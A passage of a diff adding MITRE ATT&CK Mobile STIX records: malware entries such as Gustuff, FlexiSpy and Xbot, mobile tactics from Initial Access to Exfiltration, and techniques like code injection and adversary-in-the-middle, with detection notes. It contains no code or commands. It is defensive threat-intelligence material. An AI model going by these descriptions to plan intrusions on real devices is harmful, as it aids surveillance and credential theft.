"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0406", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0406" + }, + { + "source_name": "Talos Gustuff Apr 2019", + "url": "https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html", + "description": "Vitor Ventura. (2019, April 9). Gustuff banking botnet targets Australia . Retrieved September 3, 2019." + } + ], + "modified": "2019-10-14T19:14:17.007Z", + "name": "Gustuff", + "description": "[Gustuff](https://attack.mitre.org/software/S0406) is mobile malware designed to steal users' banking and virtual currency credentials.(Citation: Talos Gustuff Apr 2019)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "labels": [ + "tool" + ], + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_contributors": [ + "Emily Ratliff, IBM" + ], + "x_mitre_aliases": [ + "FlexiSpy" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "tool--1622fd3d-fcfc-4d02-ac49-f2d786f79b81", + "type": "tool", + "created": "2019-09-04T15:38:56.070Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "S0408", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0408" + }, + { + "description": "K. Lu. (n.d.). Deep Technical Analysis of the Spyware FlexiSpy for Android. Retrieved September 10, 2019.", + "url": "https://d3gpjj9d20n0p3.cloudfront.net/fortiguard/research/Dig%20Deep%20into%20FlexiSpy%20for%20Android%28white%20paper%29_KaiLu.pdf", + "source_name": "FortiGuard-FlexiSpy" + }, + { + "source_name": "CyberMerchants-FlexiSpy", + "url": "http://www.cybermerchantsofdeath.com/blog/2017/04/22/FlexiSpy.html", + "description": "Actis B. (2017, April 22). FlexSpy Application Analysis. Retrieved September 4, 2019." + }, + { + "source_name": "FlexiSpy-Website", + "url": "https://www.flexispy.com/", + "description": "FlexiSpy. (n.d.). FlexiSpy. Retrieved September 4, 2019." + } + ], + "modified": "2019-10-14T18:08:28.349Z", + "name": "FlexiSpy", + "description": "[FlexiSpy](https://attack.mitre.org/software/S0408) is sophisticated surveillanceware for iOS and Android. Publicly-available, comprehensive analysis has only been found for the Android version.(Citation: FortiGuard-FlexiSpy)(Citation: CyberMerchants-FlexiSpy)\n\n[FlexiSpy](https://attack.mitre.org/software/S0408) markets itself as a parental control and employee monitoring application.(Citation: FlexiSpy-Website)", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Xbot", + "description": "[Xbot](https://attack.mitre.org/software/S0298) is an Android malware family that was observed in 2016 primarily targeting Android users in Russia and Australia. (Citation: PaloAlto-Xbot)", + "labels": [ + "tool" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "type": "tool", + "id": "tool--da21929e-40c0-443d-bdf4-6b60d15448b4", + "created": "2017-10-25T14:48:48.609Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0298", + "external_id": "S0298" + }, + { + "source_name": "Xbot", + "description": "(Citation: PaloAlto-Xbot)" + }, + { + "source_name": "PaloAlto-Xbot", + "description": "Cong Zheng, Claud Xiao and Zhi Xu. (2016, February 18). New Android Trojan “Xbot” Phishes Credit Cards and Bank Accounts, Encrypts Devices for Ransom. Retrieved December 21, 2016.", + "url": "http://researchcenter.paloaltonetworks.com/2016/02/new-android-trojan-xbot-phishes-credit-cards-and-bank-accounts-encrypts-devices-for-ransom/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--0a93fd8e-4a83-4c15-8203-db290e5f2ac6", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0027", + "url": "https://attack.mitre.org/tactics/TA0027", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:02:36.744Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your device.\n\nThe initial access tactic represents the vectors adversaries use to gain an initial foothold onto a mobile device.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "initial-access" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--10fa8d8d-1b04-4176-917e-738724239981", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0036", + "url": "https://attack.mitre.org/tactics/TA0036", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:42.009Z", + "name": "Exfiltration", + "description": "The adversary is trying to steal data.\n\nExfiltration refers to techniques and attributes that result or aid in the adversary removing files and information from the targeted mobile device.\n\nIn the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "exfiltration" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--363bbeff-bb2a-4734-ac74-d6d37202fe54", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0028", + "url": "https://attack.mitre.org/tactics/TA0028", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:15.455Z", + "name": "Persistence", + "description": " The adversary is trying to maintain their foothold.\n\nPersistence is any access, action, or configuration change to a mobile device that gives an attacker a persistent presence on the device. Attackers often will need to maintain access to mobile devices through interruptions such as device reboots and potentially even factory data resets.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "persistence" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3e962de5-3280-43b7-bc10-334fbc1d6fa8", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0029", + "url": "https://attack.mitre.org/tactics/TA0029", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:03:49.343Z", + "name": "Privilege Escalation", + "description": " The adversary is trying to gain higher-level permissions.\n\nPrivilege escalation includes techniques that allow an attacker to obtain a higher level of permissions on the mobile device. Attackers may enter the mobile device with very limited privileges and may be required to take advantage of a device weakness to obtain higher privileges necessary to successfully carry out their mission objectives.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "privilege-escalation" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--3f660805-fa2e-42e8-8851-57f9e9b653e3", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0037", + "url": "https://attack.mitre.org/tactics/TA0037", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:59.132Z", + "name": "Command and Control", + "description": "The adversary is trying to communicate with compromised devices to control them.\n\nThe command and control tactic represents how adversaries communicate with systems under their control within a target network. There are many ways an adversary can establish command and control with various levels of covertness, depending on system configuration and network topology. Due to the wide degree of variation available to the adversary at the network level, only the most common factors were used to describe the differences in command and control. There are still a great many specific techniques within the documented methods, largely due to how easy it is to define new protocols and use existing, legitimate protocols and network services for communication. \n\nThe resulting breakdown should help convey the concept that detecting intrusion through command and control protocols without prior knowledge is a difficult proposition over the long term. Adversaries' main constraints in network-level defense avoidance are testing and deployment of tools to rapidly change their protocols, awareness of existing defensive technologies, and access to legitimate Web services that, when used appropriately, make their tools difficult to distinguish from benign traffic.\n\nAdditionally, in the mobile environment, mobile devices are frequently connected to networks outside enterprise control such as cellular networks or public Wi-Fi networks. Adversaries could attempt to evade detection by communicating on these networks, and potentially even by using non-Internet Protocol mechanisms such as Short Message Service (SMS). However, cellular networks often have data caps and/or extra data charges that could increase the potential for adversarial communication to be detected.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "command-and-control" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--4a800987-a3a8-4d56-a1bd-0d7171431756", + "type": "x-mitre-tactic", + "created": "2020-01-27T14:00:49.089Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0041", + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0041" + } + ], + "modified": "2020-01-27T14:00:49.089Z", + "name": "Execution", + "description": "The adversary is trying to run malicious code.\n\nExecution consists of techniques that result in adversary-controlled code running on a mobile device. Techniques that run malicious code are often paired with techniques from all other tactics to achieve broader goals, like exploring a network or stealing data.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "execution" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6ebce653-294a-444a-bffb-14c04c8d137e", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0034", + "url": "https://attack.mitre.org/tactics/TA0034", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:15.308Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your devices and data.\n\nThe impact tactic consists of techniques used by the adversary to execute his or her mission objectives but that do not cleanly fit into another category such as Collection. Mission objectives vary based on each adversary's goals, but examples include toll fraud, destruction of device data, or locking the user out of his or her device until a ransom is paid.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "impact" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--6fcb36b8-3776-483b-8699-42215714fb10", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0031", + "url": "https://attack.mitre.org/tactics/TA0031", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:02.718Z", + "name": "Credential Access", + "description": "The adversary is trying to steal account names, passwords, or other secrets that enable access to resources.\n\nCredential access represents techniques that can be used by adversaries to obtain access to or control over passwords, tokens, cryptographic keys, or other values that could be used by an adversary to gain unauthorized access to resources. Credential access allows the adversary to assume the identity of an account, with all of that account's permissions on the system and network, and makes it harder for defenders to detect the adversary. With sufficient access within a network, an adversary can create accounts for later use within the environment.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "credential-access" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7a0d25d3-f0c0-40bf-bf90-c743871b19ba", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0035", + "url": "https://attack.mitre.org/tactics/TA0035", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:06:10.915Z", + "name": "Collection", + "description": "The adversary is trying to gather data of interest to their goal.\n\nCollection consists of techniques used to identify and gather information, such as sensitive files, from a target network prior to exfiltration. This category also covers locations on a system or network where the adversary may look for information to exfiltrate.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "collection" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--7be441c2-0095-4b1e-8125-fa8ffda29b0f", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0033", + "url": "https://attack.mitre.org/tactics/TA0033", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:05:37.854Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your environment.\n\nLateral movement consists of techniques that enable an adversary to access and control remote systems on a network and could, but does not necessarily, include execution of tools on remote systems. The lateral movement techniques could allow an adversary to gather information from a system without needing additional tools, such as a remote access tool.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "lateral-movement" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--987cda6d-eb77-406b-bf68-bcb5f3d2e1df", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0030", + "url": "https://attack.mitre.org/tactics/TA0030", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T14:04:46.497Z", + "name": "Defense Evasion", + "description": " The adversary is trying to avoid being detected.\n\nDefense evasion consists of techniques an adversary may use to evade detection or avoid other defenses. Sometimes these actions are the same as or variations of techniques in other categories that have the added benefit of subverting a particular defense or mitigation. Defense evasion may be considered a set of attributes the adversary applies to all other phases of the operation.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "defense-evasion" + }, + { + "modified": "2022-11-07T21:01:17.781Z", + "name": "Network Effects", + "description": "The adversary is trying to intercept or manipulate network traffic to or from a device.\n\nThis category refers to network-based techniques that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself. These include techniques to intercept or manipulate network traffic to and from the mobile device.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "network-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--9eb4c21e-4fa8-44c9-b167-dbfc455f9210", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0038", + "external_id": "TA0038" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "x-mitre-tactic--d418cdeb-1b9f-4a6b-a15d-2f89f549f8c1", + "type": "x-mitre-tactic", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "TA0032", + "url": "https://attack.mitre.org/tactics/TA0032", + "source_name": "mitre-attack" + } + ], + "modified": "2020-01-27T16:09:00.466Z", + "name": "Discovery", + "description": "The adversary is trying to figure out your environment.\n\nDiscovery consists of techniques that allow the adversary to gain knowledge about the characteristics of the mobile device and potentially other networked systems. When adversaries gain access to a new system, they must orient themselves to what they now have control of and what benefits operating from that system give to their current objective or overall goals during the intrusion. The operating system may provide capabilities that aid in this post-compromise information-gathering phase.", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_shortname": "discovery" + }, + { + "modified": "2022-11-07T21:01:36.112Z", + "name": "Remote Service Effects", + "description": "The adversary is trying to control or monitor the device using remote services.\n\nThis category refers to techniques involving remote services, such as vendor-provided cloud services (e.g. Google Drive, Google Find My Device, or Apple iCloud), or enterprise mobility management (EMM)/mobile device management (MDM) services that an adversary may be able to use to fulfill his or her objectives without access to the mobile device itself.", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "remote-service-effects", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--e78d7d60-41b5-49b7-b0a9-5c5d4cbabe17", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0039", + "external_id": "TA0039" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.0.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-24T15:09:07.609Z", + "name": "Scheduled Task/Job", + "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. On Android and iOS, APIs and libraries exist to facilitate scheduling tasks to execute at a specified date, time, or interval.\n\nOn Android, the `WorkManager` API allows asynchronous tasks to be scheduled with the system. `WorkManager` was introduced to unify task scheduling on Android, using `JobScheduler`, `GcmNetworkManager`, and `AlarmManager` internally. `WorkManager` offers a lot of flexibility for scheduling, including periodically, one time, or constraint-based (e.g. only when the device is charging).(Citation: Android WorkManager)\n\nOn iOS, the `NSBackgroundActivityScheduler` API allows asynchronous tasks to be scheduled with the system. The tasks can be scheduled to be repeating or non-repeating, however, the system chooses when the tasks will be executed. The app can choose the interval for repeating tasks, or the delay between scheduling and execution for one-time tasks.(Citation: Apple NSBackgroundActivityScheduler)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_detection": "Scheduling tasks/jobs can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Lorin Wu, Trend Micro" + ], + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--00290ac5-551e-44aa-bbd8-c4b913488a6d", + "created": "2020-11-04T16:43:31.619Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1603", + "external_id": "T1603" + }, + { + "source_name": "Android WorkManager", + "description": "Google. (n.d.). Schedule tasks with WorkManager. Retrieved November 4, 2020.", + "url": "https://developer.android.com/topic/libraries/architecture/workmanager" + }, + { + "source_name": "Apple NSBackgroundActivityScheduler", + "description": "Apple. (n.d.). NSBackgroundActivityScheduler. Retrieved November 4, 2020.", + "url": "https://developer.apple.com/documentation/foundation/nsbackgroundactivityscheduler" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--039bc59c-ecc7-4997-b2b4-4ab728bd91aa", + "created": "2019-10-30T15:37:55.029Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1540", + "url": "https://attack.mitre.org/techniques/T1540" + }, + { + "source_name": "Fadeev Code Injection Aug 2018", + "url": "https://fadeevab.com/shared-library-injection-on-android-8/", + "description": "Alexandr Fadeev. (2018, August 26). Shared Library Injection on Android 8.0. Retrieved October 30, 2019." + }, + { + "source_name": "Google Triada June 2019", + "url": "https://security.googleblog.com/2019/06/pha-family-highlights-triada.html", + "description": "Lukasz Siewierski. (2019, June 6). PHA Family Highlights: Triada. Retrieved July 16, 2019." + }, + { + "source_name": "Shunix Code Injection Mar 2016", + "url": "https://shunix.com/shared-library-injection-in-android/", + "description": "Shunix . (2016, March 22). Shared Library Injection in Android. Retrieved October 30, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may use code injection attacks to implant arbitrary code into the address space of a running application. Code is then executed or interpreted by that application. Adversaries utilizing this technique may exploit capabilities to load code in at runtime through dynamic libraries.\n\nWith root access, `ptrace` can be used to target specific applications and load shared libraries into its process memory.(Citation: Shunix Code Injection Mar 2016)(Citation: Fadeev Code Injection Aug 2018) By injecting code, an adversary may be able to gain access to higher permissions held by the targeted application by executing as the targeted application. In addition, the adversary may be able to evade detection or enable persistent access to a system under the guise of the application’s process.(Citation: Google Triada June 2019)\n", + "modified": "2022-03-30T19:14:20.369Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Code Injection", + "x_mitre_detection": "Code injection can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:39:32.207Z", + "name": "Adversary-in-the-Middle", + "description": "Adversaries may attempt to position themselves between two or more networked devices to support follow-on behaviors such as [Transmitted Data Manipulation](https://attack.mitre.org/techniques/T1565/002) or [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1642). \n\n \n\n[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1638) can be achieved through several mechanisms, such as a malicious application registering itself as a VPN client. By doing this, the adversary can effectively redirect device traffic to wherever they want. However, registering as a VPN client requires user consent on both Android and iOS. Additionally, on iOS, the application requires a special entitlement that must be granted by Apple. Alternatively, if an application is able to escalate privileges, it can potentially utilize those privileges to gain access to network traffic. \n\n \n\nOutside of a mobile device, adversaries may be able to capture traffic by employing a rogue base station or Wi-Fi access point. These devices will allow adversaries to capture network traffic after it has left the device, while it is flowing to its destination. On a local network, enterprise techniques could be used, such as DNS redirection or DNS poisoning. \n\n \n\nIf applications properly encrypt their network traffic, sensitive data may not be accessible an adversary, depending on the point of capture. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services should look for applications that request VPN access. These applications should be heavily scrutinized since VPN functionality is not very common. Mobile security products can potentially detect rogue Wi-Fi access points if the adversary is attempting to decrypt traffic using an untrusted SSL certificate. \n\n \n\nOn both Android and iOS, users must grant consent to an application to act as a VPN. Both platforms also provide visual context to the user in the top status bar when a VPN connection is active. Users can see registered VPN services in the device settings. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08e22979-d320-48ed-8711-e7bf94aabb13", + "created": "2022-04-05T20:11:08.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1638", + "external_id": "T1638" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-3.html", + "external_id": "CEL-3" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "external_id": "APP-0" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "external_id": "APP-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-8.html", + "external_id": "APP-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-12.html", + "external_id": "ECO-12" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:23:59.281Z", + "name": "Abuse Elevation Control Mechanism", + "description": "Adversaries may circumvent mechanisms designed to control elevated privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can gain on a machine. Authorization has to be granted to specific users in order to perform tasks that are designated as higher risk. An adversary can use several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "When an application requests administrator permission, users are presented with a popup and the option to grant or deny the request. Application vetting services can detect when an application requests administrator permission. Extra scrutiny could be applied to applications that do", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--08ea902d-ecb5-47ed-a453-2798057bb2d3", + "created": "2022-04-01T15:54:05.633Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1626", + "external_id": "T1626" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-22.html", + "external_id": "APP-22" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + 